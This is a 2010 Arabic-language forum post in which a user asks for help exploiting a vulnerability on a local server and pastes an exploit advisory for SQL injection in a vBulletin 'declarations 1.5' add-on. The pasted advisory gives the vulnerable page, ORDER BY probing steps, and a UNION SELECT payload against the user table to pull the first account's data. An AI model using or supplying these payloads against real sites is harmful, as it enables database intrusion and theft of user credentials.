| MOST7EL | 07-21-2010 11:33 AM |
ممكن شرح استغلال الثغرة ذي ..
ممكن شرح استغلالها ياخوان لني دخت وانا احاول فيها على السيرفر المحلي حاب اكسب خبرة منكم :cry[1]:
.............................. كود PHP:
vBulletin declarations 1.5 SQL Injection Vulnerability
___________________________________
Author: Hussin X
Mail : darkangel_G85@yahoo.com
___________________________________
script name : Organized a number of declarations
Product information :Page translator Of ar to EN
http://translate.google.com/translate?u=http%3A%2F%2Fwww.1f1f.net%
2Fvb%2Fshowthread.php%3Ft%3D189&sl=ar&tl=en&hl=en&ie=UTF-8
Download :http://www.1f1f.net/vb/attachment.php?
attachmentid=114&d=1216394461
DorK : :)
Example :
Go to url : target.com/vb/bnnr.php
Exploitation of information in the entry username
user name = ' ORDER BY 15/*
user name = ' ORDER BY 16/*
Now go to page info : " Unknown column '16' in 'order clause'"
exploit :
user name =
' UNION SELECT 1,2,3,4,5,4,7,8,9,10,11,12,13,14,15 FROM user
where+userid=1/*
| 